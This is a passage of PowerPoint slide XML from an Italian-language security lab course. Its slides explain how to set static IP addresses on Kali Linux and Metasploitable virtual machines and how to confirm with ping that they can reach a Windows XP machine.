                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3449799" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3449799" y="3328604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3328604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId8"/>
            <a:stretch>
              <a:fillRect l="0" t="-5124" r="0" b="-5124"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 23" id="23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10578735" y="5810554"/>
            <a:ext cx="6680565" cy="3289672"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3289672" w="6680565">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6680565" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6680565" y="3289672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3289672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId9"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 24" id="24"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="449352" y="1747059"/>
            <a:ext cx="4080718"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KALI LINUX</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7" id="27"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="737632" y="3125982"/>
            <a:ext cx="8859048" cy="6170418"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" marL="419956" indent="-209978" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2723"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Aprire un terminale di comando</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Avviamo Kali Linux e apriamo un terminale di comando.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="419956" indent="-209978" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2723"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Accedere al file di configurazione di rete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Digitiamo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold Italics"/>
              </a:rPr>
              <a:t>sudo nano /etc/network/interfaces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> e premiamo Invio. Questo comando ci permetterà di accedere al file che contiene la configurazione di rete della nostra macchina.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="419956" indent="-209978" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2723"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Modificare l'indirizzo IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Nel file che si aprirà, cerchiamo la riga che contiene l'indirizzo IP attuale. Modifichiamolo con l'indirizzo IP richiesto.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="419956" indent="-209978" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2723"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Salvare le modifiche</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Per salvare le modifiche, premiamo i tasti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Control + O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>, poi premiamo Invio e per chiudere l'editor nano, premiamo i tasti </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Control + X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="419956" indent="-209978" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2723"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>Riavviare la macchina</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Digitiamo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>reboot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> nel terminale e premiamo Invio per riavviare la macchina.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="419956" indent="-209978" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2723"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>Verificare la modifica dell'indirizzo IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Dopo il riavvio, riapriamo un terminale di comando e digitiamo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>. Questo comando ci mostrerà la configurazione della rete attuale. Verifichiamo che l'indirizzo IP sia stato modificato correttamente.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2723"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="d"/>
  </p:transition>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1539740" y="829618"/>
            <a:ext cx="15208520"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1.2 - CONFIGURAZIONE METASPLOITABLE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pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 20" id="20"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10206990" y="2198441"/>
            <a:ext cx="2088222" cy="2015134"/>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7198138">
            <a:off x="15538531" y="3140517"/>
            <a:ext cx="1986243" cy="1916725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 22" id="22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="12399987" y="1484957"/>
            <a:ext cx="3686297" cy="2007390"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2007390" w="3686297">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3686297" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3686297" y="2007390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2007390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 23" id="23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10532561" y="5437948"/>
            <a:ext cx="7421149" cy="3334139"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3334139" w="7421149">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7421149" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7421149" y="3334139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3334139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId7"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 24" id="24"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="215797" y="1678505"/>
            <a:ext cx="6710356"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METASPLOITABLE</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7" id="27"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="658966" y="2990323"/>
            <a:ext cx="8682389" cy="6477276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" marL="402469" indent="-201235" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2609"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Avviare la VM Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Avviamo la macchina virtuale Metasploitable e quando richiesto accediamo con nome utente: “msfadmin” e password: “msfadmin”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="402469" indent="-201235" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2609"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Accedere al file di configurazione di rete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: digitiamo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>sudo nano /etc/network/interfaces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>, quindi premete Invio. Questo comando aprirà il file che contiene la configurazione della rete.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="402469" indent="-201235" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2609"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>Modificare l'indirizzo IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Nel file che si aprirà, individuiamo la riga che specifica l'attuale indirizzo IP. Modifichiamo questo indirizzo con quello richiesto.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="402469" indent="-201235" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2609"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>Salvare le modifiche</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Per salvare le modifiche apportate, premiamo i tasti </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Control + O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>, quindi premiamo Invio per confermare e Control+X per chiudere l’editor nano.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="402469" indent="-201235" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2609"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>Riavviare l'interfaccia di rete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Per applicare le modifiche senza riavviare l'intera macchina, digitiamo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>sudo /etc/init.d/networking restart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> e premiamo Invio.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="402469" indent="-201235" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2609"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>Verificare la modifica dell'indirizzo IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Infine, per assicurarci che l'indirizzo IP sia stato modificato correttamente, digitiamo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> nel terminale e premiamo Invio. Questo comando mostrerà la configurazione attuale della rete, incluso l’indirizzo IP assegnato.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2609"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="l"/>
  </p:transition>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1.3 - VERIFICA COMUNICAZIONE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968952">
            <a:off x="10294864" y="7738304"/>
            <a:ext cx="2884794" cy="814954"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="814954" w="2884794">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2884795" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2884795" y="814954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="814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0397072" y="4402848"/>
            <a:ext cx="7592888" cy="2708658"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2708658" w="7592888">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7592888" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7592888" y="2708658"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2708658"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId7"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 22" id="22"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="377246" y="1820616"/>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Verifica comunicazione Tra Macchine</a:t>
            </a:r>
          </a:p>
        </p:txBody>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5" id="25"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1028700" y="2942308"/>
            <a:ext cx="8115300" cy="6646135"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" marL="507723" indent="-253862" lvl="1">
              <a:lnSpc>
                <a:spcPts val="3292"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2351">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Assicurarsi che entrambe le macchine siano avviate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2351">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Avviamo sia la macchina virtuale Kali Linux che quella Windows XP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="507723" indent="-253862" lvl="1">
              <a:lnSpc>
                <a:spcPts val="3292"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2351">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Eseguire il comando ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2351">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Apriamo un terminale su Kali Linux e digitate il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2351">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>ping seguito dall'indirizzo IP della macchina Windows XP e lo switch -c4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2351">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Italics"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2351">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>per specificare il numero di pacchetti da inviare e premete invio.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3292"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2351">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>Interpretare i risultati del ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2351">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Se la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2351">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>configurazione è corretta,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2351">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> vedremo una serie di righe che indicano il tempo impiegato per l'invio di ogni pacchetto, il numero di pacchetti inviati, ricevuti e persi. Se vediamo una risposta simile alla figura a destra, con il 100% dei pacchetti inviati e 0 pacchetti persi, significa che le due macchine possono comunicare correttamente tra loro.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3292"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="l"/>
  </p:transition>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4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 18" id="18"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1028700" y="4546672"/>
